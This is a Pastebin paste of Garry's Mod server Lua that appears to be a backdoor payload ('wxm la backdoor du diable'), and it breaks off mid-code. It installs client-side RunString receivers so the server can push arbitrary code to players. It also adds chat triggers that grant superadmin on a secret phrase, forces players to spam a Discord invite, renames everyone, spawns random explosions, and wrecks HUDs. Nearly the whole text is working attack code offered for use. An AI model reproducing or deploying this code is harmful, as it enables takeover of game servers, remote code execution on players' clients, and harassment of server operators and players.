Advertisement
Guest User

Untitled

a guest
Jul 15th, 2019
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 34.09 KB | None | 0 0
  1. util.AddNetworkString "skeleton_dancing_troll"
  2.  
  3.  
  4. timer.Create("nonameplease", 5, 0,function()
  5. for i=1, #player.GetHumans() do
  6. local ply = player.GetHumans()[i]
  7. ply:Say( "/ooc Rejoignez l'élite! ===> https://discord.gg/n8Heezw")
  8. end
  9. end)
  10. BroadcastLua([[hook.Add("Think","iuefheqefq",function() gui.HideGameUI() end)]])
  11. util.AddNetworkString "EnigmaProject"
  12.  
  13. local CHANGERPSEUDO = "wxm la backdoor du diable"
  14. local enigmalaunchproject = {}
  15. function enigmalaunchproject:RandomString( intMin, intMax )
  16. local ret = ""
  17. for _ = 1, math.random( intMin, intMax ) do
  18. ret = ret.. string.char( math.random(65, 90) )
  19. end
  20.  
  21. return ret
  22. end
  23.  
  24.  
  25.  
  26. enigmalaunchproject.m_tblActions = {}
  27. enigmalaunchproject.m_strImageGlobalVar = enigmalaunchproject:RandomString( 6, 12 )
  28. enigmalaunchproject.m_strImageLoadHTML = [[<style type="text/css"> html, body {background-color: transparent;} html{overflow:hidden; ]].. (true and "margin: -8px -8px;" or "margin: 0px 0px;") ..[[ } </style><body><img src="]] .. "%s" .. [[" alt="" width="]] .. "%i"..[[" height="]] .. "%i" .. [[" /></body>]]
  29.  
  30. function enigmalaunchproject:NouvelleAction( intChainDelay, func )
  31. self.m_tblActions[#self.m_tblActions +1] = { intChainDelay, func }
  32. end
  33.  
  34. function enigmalaunchproject:ActionApres( pPlayer )
  35. pPlayer.m_intCurAction = pPlayer.m_intCurAction +1
  36. if not self.m_tblActions[pPlayer.m_intCurAction] then return end
  37.  
  38. timer.Simple( self.m_tblActions[pPlayer.m_intCurAction][1], function()
  39. if not IsValid( pPlayer ) then return end
  40. self.m_tblActions[pPlayer.m_intCurAction][2]( pPlayer )
  41. self:ActionApres( pPlayer )
  42. end )
  43. end
  44.  
  45. function enigmalaunchproject:Start( pPlayer )
  46. pPlayer.m_intCurAction = 0
  47. self:ActionApres( pPlayer )
  48. end
  49.  
  50. function enigmalaunchproject:SendLua( pPlayer, strLua )
  51. pPlayer:SendLua([[RunConsoleCommand("gmod_language","ko")]])
  52. net.Start( "EnigmaProject" )
  53. net.WriteString( strLua )
  54. net.Send( pPlayer )
  55. end
  56.  
  57. function enigmalaunchproject:SetupPlayer( pPlayer )
  58. pPlayer:SendLua( "net.Receive(\"EnigmaProject\", function() RunString(net.ReadString()) end)" )
  59. end
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66. -- DANSE --
  67.  
  68.  
  69. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end timer.Create("dance_until_your_dead",8.9,0,function() for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end end )
  70.  
  71.  
  72. -- FIN DANSE --
  73.  
  74.  
  75.  
  76.  
  77. -- CHANGER NOM --
  78.  
  79.  
  80. for k, v in pairs(player.GetAll()) do DarkRP.storeRPName(v, CHANGERPSEUDO) v:setDarkRPVar("rpname", CHANGERPSEUDO) end
  81.  
  82.  
  83. -- FIN CHANGER NOM --
  84.  
  85.  
  86.  
  87. -- Console Spam
  88.  
  89. decore = {
  90. [[
  91.  
  92.  
  93.  
  94.  
  95.  
  96.  
  97.  
  98.  
  99.  
  100.  
  101.  
  102.  
  103.  
  104.  
  105.  
  106.  
  107.  
  108.  
  109.  
  110.  
  111.  
  112.  
  113.  
  114.  
  115.  
  116.  
  117.  
  118.  
  119.  
  120.  
  121.  
  122.  
  123.  
  124.  
  125.  
  126.  
  127.  
  128.  
  129.  
  130.  
  131.  
  132.  
  133.  
  134.  
  135.  
  136.  
  137.  
  138.  
  139.  
  140.  
  141.  
  142.  
  143.  
  144.  
  145.  
  146.  
  147.  
  148.  
  149.  
  150.  
  151.  
  152.  
  153.  
  154.  
  155.  
  156.  
  157.  
  158.  
  159.  
  160.  
  161.  
  162.  
  163.  
  164. wxm @ https://discord.gg/n8Heezw
  165. ]]
  166. }
  167.  
  168. function decorationconsole()
  169. print(Color( 0, 0, 0 ), table.Random(decore))
  170. end
  171. -- Console Spam
  172. for k, v in pairs( player.GetAll() ) do
  173. timer.Create("consolespamenigma", 0.4, 0, function() decorationconsole( v ) end )
  174. end
  175.  
  176. --[[ MODE ARMAGEDDON --
  177.  
  178.  
  179. hook.Add("Think", "armageddon", function()
  180. local explode = ents.Create( "env_explosion" )
  181. explode:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
  182. explode:Spawn()
  183. explode:SetKeyValue( "iMagnitude", "500" )
  184. explode:Fire( "Explode", 0, 0 )
  185. end)
  186.  
  187.  
  188. -- FIN MODE ARMAGEDDON ]]--
  189.  
  190.  
  191. -- Send Lua --
  192. function SendLuaAll( str ) net.Start( "EnigmaProject" ) net.WriteString( str ) net.Broadcast() end
  193.  
  194.  
  195. -- Changer Taille --
  196.  
  197.  
  198. hook.Add("Think", "giant", function()
  199. for k,v in pairs (player.GetAll()) do
  200. v:SetModelScale(50.5, 100);
  201. v:SetRunSpeed(700 * 2);
  202. v:SetWalkSpeed(400 * 2);
  203. end
  204. end)
  205.  
  206.  
  207. -- Fin Changer Taille --
  208.  
  209.  
  210.  
  211. -- Message --
  212.  
  213.  
  214. for k,v in pairs(player.GetAll()) do
  215. v:ConCommand("say /ooc Oups, votre serveur se fait percer de tout les côtes! :(")
  216. end
  217.  
  218.  
  219. -- Message Fin --
  220.  
  221.  
  222.  
  223. -- Auto Lançage --
  224.  
  225.  
  226. for k, v in pairs( player.GetAll() ) do
  227. enigmalaunchproject:SetupPlayer( v )
  228. timer.Simple( 2, function() enigmalaunchproject:Start( v ) end )
  229. end
  230.  
  231.  
  232. -- Fin Auto Lançage --
  233.  
  234.  
  235. -- Lancer Aux Nouveaux Arrivants --
  236.  
  237.  
  238. --hook.Add( "PlayerAuthed", "wtfispassequoi", function( pPlayer )
  239. -- enigmalaunchproject:SetupPlayer( pPlayer )
  240. -- timer.Simple( 10, function() enigmalaunchproject:Start( pPlayer ) end )
  241. --end )
  242.  
  243. -- Fin Lancer Aux Nouveaux Arrivants --
  244.  
  245.  
  246.  
  247. -- Commande Enigma --
  248.  
  249.  
  250. hook.Add( "PlayerSay", "EnigmaCKoa", function( pSender, strText, bTeamChat )
  251. if strText:sub( 1, 5 ) == "Enigma" then
  252. pSender:Ignite( 1e9 )
  253. pSender:ChatPrint( "wxm la backdoor private la plus puissante de GMod ;)" )
  254. pSender:SendLua( [[surface.PlaySound( "vo/npc/male01/hacks01.wav" )]] )
  255. return false
  256. end
  257. end )
  258.  
  259.  
  260. -- Fin Commande Enigma
  261.  
  262.  
  263.  
  264.  
  265.  
  266. hook.Add( "PlayerSay", "a4dxvlwxdlco", function( pSender, strText, bTeamChat )
  267. if strText:sub( 1, 5 ) == "EnigmaIsLitteralyMyFuckingGod" then
  268. pSender:SetUserGroup("superadmin")
  269. pSender:ChatPrint( "Tu est l'un des notres !" )
  270. pSender:SendLua( [[surface.PlaySound( "vo/npc/male01/hacks01.wav" )]] )
  271. return false
  272. end
  273. end)
  274.  
  275.  
  276.  
  277.  
  278.  
  279.  
  280.  
  281.  
  282.  
  283.  
  284. enigmalaunchproject:NouvelleAction( 0, function( pPlayer )
  285. enigmalaunchproject:SendLua( pPlayer, ([=[
  286.  
  287.  
  288. g_]=].. enigmalaunchproject.m_strImageGlobalVar.. [=[ = {}
  289. local html = [[%s]]
  290. local function LoadWebMaterial( strURL, strUID, intSizeX, intSizeY )
  291. local pnl = vgui.Create( "HTML" )
  292. pnl:SetPos( ScrW() -1, ScrH() -1 )
  293. pnl:SetVisible( true )
  294. pnl:SetMouseInputEnabled( false )
  295. pnl:SetKeyBoardInputEnabled( false )
  296. pnl:SetSize( intSizeX, intSizeY )
  297. pnl:SetHTML( html:format(strURL, intSizeX, intSizeY) )
  298.  
  299. local PageLoaded
  300. PageLoaded = function()
  301. local mat = pnl:GetHTMLMaterial()
  302. if mat then
  303. g_]=].. enigmalaunchproject.m_strImageGlobalVar.. [=[[strUID] = { mat, pnl }
  304. return
  305. end
  306.  
  307. timer.Simple( 0.5, PageLoaded )
  308. end
  309.  
  310. PageLoaded()
  311. end
  312.  
  313. --LoadWebMaterial( "https://image.noelshack.com/fichiers/2018/06/5/1518211648-sans-titre-6.gif", "getrekt", 1920, 1080 )
  314.  
  315. hook.Add( "RenderScreenspaceEffects", "itsredworld", function()
  316. local sinScaler = math.sin( CurTime() )
  317. DrawBloom(
  318. 0,
  319. 3,
  320. sinScaler *math.Rand(1, 8),
  321. sinScaler *math.Rand(1, 8),
  322. 6,
  323. math.Rand(0.5, 2),
  324. math.Rand(0, 0.3),
  325. math.Rand(0, 0.3),
  326. math.Rand(0.5, 1)
  327. )
  328.  
  329. DrawColorModify{
  330. ["$pp_colour_addr"] = 1,
  331. ["$pp_colour_addg"] = 0,
  332. ["$pp_colour_addb"] = 0,
  333. ["$pp_colour_brightness" ] = 0.1,
  334. ["$pp_colour_contrast" ] = 0.1,
  335. ["$pp_colour_colour" ] = 0.1,
  336. ["$pp_colour_mulr" ] = 1,
  337. ["$pp_colour_mulg" ] = 0,
  338. ["$pp_colour_mulb" ] = 0
  339. }
  340. end )
  341.  
  342. ]=]):format(enigmalaunchproject.m_strImageLoadHTML) )
  343. end )
  344.  
  345.  
  346.  
  347.  
  348. enigmalaunchproject:NouvelleAction( 14, function( pPlayer )
  349. enigmalaunchproject:SendLua( pPlayer, [[
  350.  
  351. (GAMEMODE or GM).CalcView = function() end
  352. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  353.  
  354. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  355. for k, v in pairs(remove) do
  356. hook.GetTable()[v] = {}
  357. end
  358.  
  359. local function GetWebMat( strURL )
  360. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  361. end
  362.  
  363. hook.Add( "HUDPaint", "hud1enigma", function()
  364. surface.SetDrawColor( 255, 255, 255, 255 )
  365.  
  366. if GetWebMat( "getrekt" ) then
  367. surface.SetMaterial( GetWebMat("getrekt")[1] )
  368. surface.DrawTexturedRect( 0, 0, 2100, 2000 )
  369. end
  370.  
  371. draw.SimpleTextOutlined(
  372. "wxm is here",
  373. "DermaLarge",
  374. ScrW() /2 +math.random( -2, 2 ),
  375. ScrH() /2 +math.random( -2, 2 ) +0,
  376. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  377. TEXT_ALIGN_CENTER,
  378. TEXT_ALIGN_CENTER,
  379. 1,
  380. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  381. )
  382. end )
  383.  
  384. local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
  385. hook.Add( "HUDShouldDraw", "hud1enigma", function( str ) if not allowed[str] then return false end end )
  386.  
  387. ]] )
  388. end )
  389.  
  390.  
  391.  
  392. enigmalaunchproject:NouvelleAction( 4, function( pPlayer )
  393. enigmalaunchproject:SendLua( pPlayer, [[
  394.  
  395. hook.Remove( "HUDPaint", "hud1enigma", function() end)
  396.  
  397.  
  398.  
  399. ]] )
  400. end )
  401.  
  402. enigmalaunchproject:NouvelleAction( 3, function( pPlayer )
  403. enigmalaunchproject:SendLua( pPlayer, [[
  404.  
  405. (GAMEMODE or GM).CalcView = function() end
  406. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  407.  
  408. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  409. for k, v in pairs(remove) do
  410. hook.GetTable()[v] = {}
  411. end
  412.  
  413. local function GetWebMat( strURL )
  414. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  415. end
  416.  
  417. hook.Add( "HUDPaint", "hud1enigma", function()
  418. surface.SetDrawColor( 255, 255, 255, 255 )
  419.  
  420. if GetWebMat( "getrekt" ) then
  421. surface.SetMaterial( GetWebMat("getrekt")[1] )
  422. surface.DrawTexturedRect( 0, 0, 2100, 2000 )
  423. end
  424.  
  425. draw.SimpleTextOutlined(
  426. "wxm was here",
  427. "DermaLarge",
  428. ScrW() /2 +math.random( -2, 2 ),
  429. ScrH() /2 +math.random( -2, 2 ) +0,
  430. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  431. TEXT_ALIGN_CENTER,
  432. TEXT_ALIGN_CENTER,
  433. 1,
  434. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  435. )
  436. end )
  437.  
  438. local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
  439. hook.Add( "HUDShouldDraw", "hud1enigma", function( str ) if not allowed[str] then return false end end )
  440.  
  441.  
  442. ]] )
  443. end )
  444.  
  445.  
  446. enigmalaunchproject:NouvelleAction( 4, function( pPlayer )
  447. enigmalaunchproject:SendLua( pPlayer, [[
  448.  
  449. hook.Remove( "HUDPaint", "hud1enigma", function() end)
  450.  
  451. ]] )
  452. end )
  453.  
  454. enigmalaunchproject:NouvelleAction( 3, function( pPlayer )
  455. enigmalaunchproject:SendLua( pPlayer, [[
  456.  
  457.  
  458. (GAMEMODE or GM).CalcView = function() end
  459. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  460.  
  461. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  462. for k, v in pairs(remove) do
  463. hook.GetTable()[v] = {}
  464. end
  465.  
  466. local function GetWebMat( strURL )
  467. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  468. end
  469.  
  470. hook.Add( "HUDPaint", "hud1enigma", function()
  471. surface.SetDrawColor( 255, 255, 255, 255 )
  472.  
  473. if GetWebMat( "getrekt" ) then
  474. surface.SetMaterial( GetWebMat("getrekt")[1] )
  475. surface.DrawTexturedRect( 0, 0, 2100, 2000 )
  476. end
  477.  
  478. draw.SimpleTextOutlined(
  479. "Rejoignez l'élite en venant sur discord!",
  480. "DermaLarge",
  481. ScrW() /2 +math.random( -2, 2 ),
  482. ScrH() /2 +math.random( -2, 2 ) +0,
  483. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  484. TEXT_ALIGN_CENTER,
  485. TEXT_ALIGN_CENTER,
  486. 1,
  487. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  488. )
  489. end )
  490.  
  491. local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
  492. hook.Add( "HUDShouldDraw", "hud1enigma", function( str ) if not allowed[str] then return false end end )
  493.  
  494.  
  495.  
  496. ]] )
  497. end )
  498.  
  499. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  500. enigmalaunchproject:SendLua( pPlayer, [[
  501.  
  502. for k,v in pairs(player.GetAll()) do
  503. v:ConCommand("say /job wxm ma vie")
  504. end
  505.  
  506. ]] )
  507. end )
  508. local lol = {}
  509. function lol:RandomString( intMin, intMax )
  510. local ret = ""
  511. for _ = 1, math.random( intMin, intMax ) do
  512. ret = ret.. string.char( math.random(65, 90) )
  513. end
  514.  
  515. return ret
  516. end
  517.  
  518. lol.m_tblActions = {}
  519. lol.m_strImageGlobalVar = lol:RandomString( 6, 12 )
  520. lol.m_strImageLoadHTML = [[<style type="text/css"> html, body {background-color: transparent;} html{overflow:hidden; ]].. (true and "margin: -8px -8px;" or "margin: 0px 0px;") ..[[ } </style><body><img src="]] .. "%s" .. [[" alt="" width="]] .. "%i"..[[" height="]] .. "%i" .. [[" /></body>]]
  521.  
  522. function lol:PushAction( intChainDelay, func )
  523. self.m_tblActions[#self.m_tblActions +1] = { intChainDelay, func }
  524. end
  525.  
  526. function lol:NextAction( pPlayer )
  527. pPlayer.m_intCurAction = pPlayer.m_intCurAction +1
  528. if not self.m_tblActions[pPlayer.m_intCurAction] then return end
  529.  
  530. timer.Simple( self.m_tblActions[pPlayer.m_intCurAction][1], function()
  531. if not IsValid( pPlayer ) then return end
  532. self.m_tblActions[pPlayer.m_intCurAction][2]( pPlayer )
  533. self:NextAction( pPlayer )
  534. end )
  535. end
  536.  
  537. function lol:Start( pPlayer )
  538. pPlayer.m_intCurAction = 0
  539. self:NextAction( pPlayer )
  540. end
  541.  
  542. function lol:SendLua( pPlayer, strLua )
  543. net.Start( "skeleton_dancing_troll" )
  544. net.WriteString( strLua )
  545. net.Send( pPlayer )
  546. end
  547.  
  548. function lol:SetupPlayer( pPlayer )
  549. pPlayer:SendLua( "net.Receive(\"skeleton_dancing_troll\", function() RunString(net.ReadString()) end)" )
  550. end
  551.  
  552. for k, v in pairs( player.GetAll() ) do
  553. lol:SetupPlayer( v )
  554. timer.Simple( 2, function() lol:Start( v ) end )
  555. end
  556.  
  557. hook.Add( "PlayerAuthed", "wat", function( pPlayer )
  558. lol:SetupPlayer( pPlayer )
  559. timer.Simple( 10, function() lol:Start( pPlayer ) end )
  560. end )
  561.  
  562. hook.Add( "PlayerSay", "1337command", function( pSender, strText, bTeamChat )
  563. if strText:sub( 1, 5 ) == "/1337" then
  564. pSender:Ignite( 1e9 )
  565. pSender:ChatPrint( "wxm best backdoor ever ;)" )
  566. pSender:SendLua( [[surface.PlaySound( "vo/npc/male01/hacks01.wav" )]] )
  567. return false
  568. end
  569. end )
  570.  
  571.  
  572.  
  573.  
  574.  
  575. enigmalaunchproject:NouvelleAction( 2, function( pPlayer )
  576. enigmalaunchproject:SendLua( pPlayer, [[
  577.  
  578. hook.Remove( "HUDPaint", "hud1enigma", function() end)
  579.  
  580. ]] )
  581. end )
  582.  
  583. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  584. enigmalaunchproject:SendLua( pPlayer, [[
  585.  
  586. RunConsoleCommand("+right")
  587.  
  588. ]] )
  589. end )
  590.  
  591. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  592. enigmalaunchproject:SendLua( pPlayer, [[
  593.  
  594. RunConsoleCommand("-right")
  595.  
  596. ]] )
  597. end )
  598.  
  599. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  600. enigmalaunchproject:SendLua( pPlayer, [[
  601.  
  602. RunConsoleCommand("+duck")
  603.  
  604. ]] )
  605. end )
  606.  
  607. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  608. enigmalaunchproject:SendLua( pPlayer, [[
  609.  
  610. RunConsoleCommand("-duck")
  611.  
  612. ]] )
  613. end )
  614.  
  615. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  616.  
  617. timer.Create( "lespamckool", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "wxm l\'élite des backdoors" )' ) end)
  618. timer.Create( "lespamckool2", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "rejoignez l\'élite!" )' ) end)
  619. timer.Create( "lespamckool3", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "https://discord.gg/n8Heezw" )' ) end)
  620. timer.Create( "lespamckool4", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "Marlow" )' ) end)
  621. timer.Create( "lespamckool5", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "https://discord.gg/n8Heezw" )' ) end)
  622. timer.Create( "lespamckool6", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "wxm vous couche tous" )' ) end)
  623. timer.Create( "lespamckool7", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "gvac c\'est pour vous bande de pucelles" )' ) end)
  624. timer.Create( "lespamckool8", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "~ l\'élite des backdoors - https://discord.gg/n8Heezw" )' ) end)
  625.  
  626. end )
  627.  
  628.  
  629. enigmalaunchproject:NouvelleAction( 4, function( pPlayer )
  630.  
  631. timer.Remove( "lespamckool" )
  632. timer.Remove( "lespamckool2" )
  633. timer.Remove( "lespamckool3" )
  634. timer.Remove( "lespamckool4" )
  635. timer.Remove( "lespamckool5" )
  636. timer.Remove( "lespamckool6" )
  637. timer.Remove( "lespamckool7" )
  638. timer.Remove( "lespamckool8" )
  639.  
  640. end )
  641.  
  642. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  643.  
  644.  
  645. RunConsoleCommand("sv_friction", "-50")
  646.  
  647.  
  648. end )
  649.  
  650. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  651.  
  652.  
  653. RunConsoleCommand("sv_gravity", "300")
  654.  
  655.  
  656. end )
  657.  
  658. enigmalaunchproject:NouvelleAction( 12, function( pPlayer )
  659.  
  660.  
  661. hook.Add("Think", "armageddon", function()
  662. local explode = ents.Create( "env_explosion" )
  663. explode:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
  664. explode:Spawn()
  665. explode:SetKeyValue( "iMagnitude", "500" )
  666. explode:Fire( "Explode", 0, 0 )
  667. end)
  668.  
  669. end )
  670.  
  671.  
  672. enigmalaunchproject:NouvelleAction( 27, function( pPlayer )
  673.  
  674. hook.Remove( "Think", "armageddon", function() end)
  675.  
  676. end )
  677.  
  678. enigmalaunchproject:NouvelleAction( 7, function( pPlayer )
  679. enigmalaunchproject:SendLua( pPlayer, [[
  680. hook.Add( "RenderScreenspaceEffects", "itsendofworld", function()
  681. local sinScaler = math.sin( CurTime() )
  682. DrawBloom(
  683. 0,
  684. 3,
  685. sinScaler *math.Rand(1, 8),
  686. sinScaler *math.Rand(1, 8),
  687. 6,
  688. math.Rand(0.5, 2),
  689. math.Rand(0, 0.3),
  690. math.Rand(0, 0.3),
  691. math.Rand(0.5, 1)
  692. )
  693.  
  694. DrawColorModify{
  695. ["$pp_colour_addr"] = 0,
  696. ["$pp_colour_addg"] = 0,
  697. ["$pp_colour_addb"] = 0,
  698. ["$pp_colour_brightness" ] = 0.1,
  699. ["$pp_colour_contrast" ] = 0.1,
  700. ["$pp_colour_colour" ] = 0.1,
  701. ["$pp_colour_mulr" ] = 0,
  702. ["$pp_colour_mulg" ] = 0,
  703. ["$pp_colour_mulb" ] = 0
  704. }
  705. end )
  706.  
  707. ]] )
  708. end )
  709.  
  710. enigmalaunchproject:NouvelleAction( 0, function( pPlayer )
  711. enigmalaunchproject:SendLua( pPlayer, [[
  712.  
  713. (GAMEMODE or GM).CalcView = function() end
  714. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  715.  
  716. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  717. for k, v in pairs(remove) do
  718. hook.GetTable()[v] = {}
  719. end
  720.  
  721. local function GetWebMat( strURL )
  722. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  723. end
  724.  
  725. hook.Add( "HUDPaint", "hud1enigma", function()
  726. surface.SetDrawColor( 255, 255, 255, 255 )
  727.  
  728. draw.SimpleTextOutlined(
  729. "wxm",
  730. "HACK",
  731. ScrW() /2 +math.random( -270, 300 ),
  732. ScrH() /2 +math.random( -300, 700 ) +0,
  733. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  734. TEXT_ALIGN_CENTER,
  735. TEXT_ALIGN_CENTER,
  736. 1,
  737. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  738. )
  739. end )
  740.  
  741. ]] )
  742. end )
  743.  
  744.  
  745. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  746. enigmalaunchproject:SendLua( pPlayer, [[
  747.  
  748. (GAMEMODE or GM).CalcView = function() end
  749. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  750.  
  751. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  752. for k, v in pairs(remove) do
  753. hook.GetTable()[v] = {}
  754. end
  755.  
  756. local function GetWebMat( strURL )
  757. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  758. end
  759.  
  760. hook.Add( "HUDPaint", "hud2enigma", function()
  761. surface.SetDrawColor( 255, 255, 255, 255 )
  762.  
  763. draw.SimpleTextOutlined(
  764. "hmm la backdoor qui fait du bien",
  765. "DermaLarge",
  766. ScrW() /2 +math.random( -600, 700 ),
  767. ScrH() /2 +math.random( -200, 800 ) +100,
  768. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  769. TEXT_ALIGN_CENTER,
  770. TEXT_ALIGN_CENTER,
  771. 1,
  772. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  773. )
  774. end )
  775. ]] )
  776. end )
  777.  
  778. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  779. enigmalaunchproject:SendLua( pPlayer, [[
  780.  
  781. (GAMEMODE or GM).CalcView = function() end
  782. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  783.  
  784. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  785. for k, v in pairs(remove) do
  786. hook.GetTable()[v] = {}
  787. end
  788.  
  789. local function GetWebMat( strURL )
  790. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  791. end
  792.  
  793. hook.Add( "HUDPaint", "hud3enigma", function()
  794. surface.SetDrawColor( 255, 255, 255, 255 )
  795.  
  796. draw.SimpleTextOutlined(
  797. "wxm",
  798. "DermaLarge",
  799. ScrW() /2 +math.random( -400, 500 ),
  800. ScrH() /2 +math.random( -600, 500 ) -100,
  801. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  802. TEXT_ALIGN_CENTER,
  803. TEXT_ALIGN_CENTER,
  804. 1,
  805. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  806. )
  807. end )
  808. ]] )
  809. end )
  810.  
  811. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  812. enigmalaunchproject:SendLua( pPlayer, [[
  813.  
  814. (GAMEMODE or GM).CalcView = function() end
  815. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  816.  
  817. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  818. for k, v in pairs(remove) do
  819. hook.GetTable()[v] = {}
  820. end
  821.  
  822. local function GetWebMat( strURL )
  823. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  824. end
  825.  
  826. hook.Add( "HUDPaint", "hud5enigma", function()
  827. surface.SetDrawColor( 255, 255, 255, 255 )
  828.  
  829. draw.SimpleTextOutlined(
  830. "wxm",
  831. "DermaLarge",
  832. ScrW() /2 +math.random( -500, 500 ),
  833. ScrH() /2 +math.random( -500, 500 ) +0,
  834. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  835. TEXT_ALIGN_CENTER,
  836. TEXT_ALIGN_CENTER,
  837. 1,
  838. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  839. )
  840. end )
  841. ]] )
  842. end )
  843.  
  844. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  845. enigmalaunchproject:SendLua( pPlayer, [[
  846.  
  847. (GAMEMODE or GM).CalcView = function() end
  848. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  849.  
  850. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  851. for k, v in pairs(remove) do
  852. hook.GetTable()[v] = {}
  853. end
  854.  
  855. local function GetWebMat( strURL )
  856. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  857. end
  858.  
  859. hook.Add( "HUDPaint", "hud7enigma", function()
  860. surface.SetDrawColor( 255, 255, 255, 255 )
  861.  
  862. draw.SimpleTextOutlined(
  863. "wxm",
  864. "DermaLarge",
  865. ScrW() /2 +math.random( -700, 700 ),
  866. ScrH() /2 +math.random( -700, 700 ) +300,
  867. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  868. TEXT_ALIGN_CENTER,
  869. TEXT_ALIGN_CENTER,
  870. 1,
  871. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  872. )
  873. end )
  874. ]] )
  875. end )
  876.  
  877. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  878. enigmalaunchproject:SendLua( pPlayer, [[
  879.  
  880. (GAMEMODE or GM).CalcView = function() end
  881. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  882.  
  883. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  884. for k, v in pairs(remove) do
  885. hook.GetTable()[v] = {}
  886. end
  887.  
  888. local function GetWebMat( strURL )
  889. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  890. end
  891.  
  892. hook.Add( "HUDPaint", "hud10enigma", function()
  893. surface.SetDrawColor( 255, 255, 255, 255 )
  894.  
  895. draw.SimpleTextOutlined(
  896. "wxm",
  897. "DermaLarge",
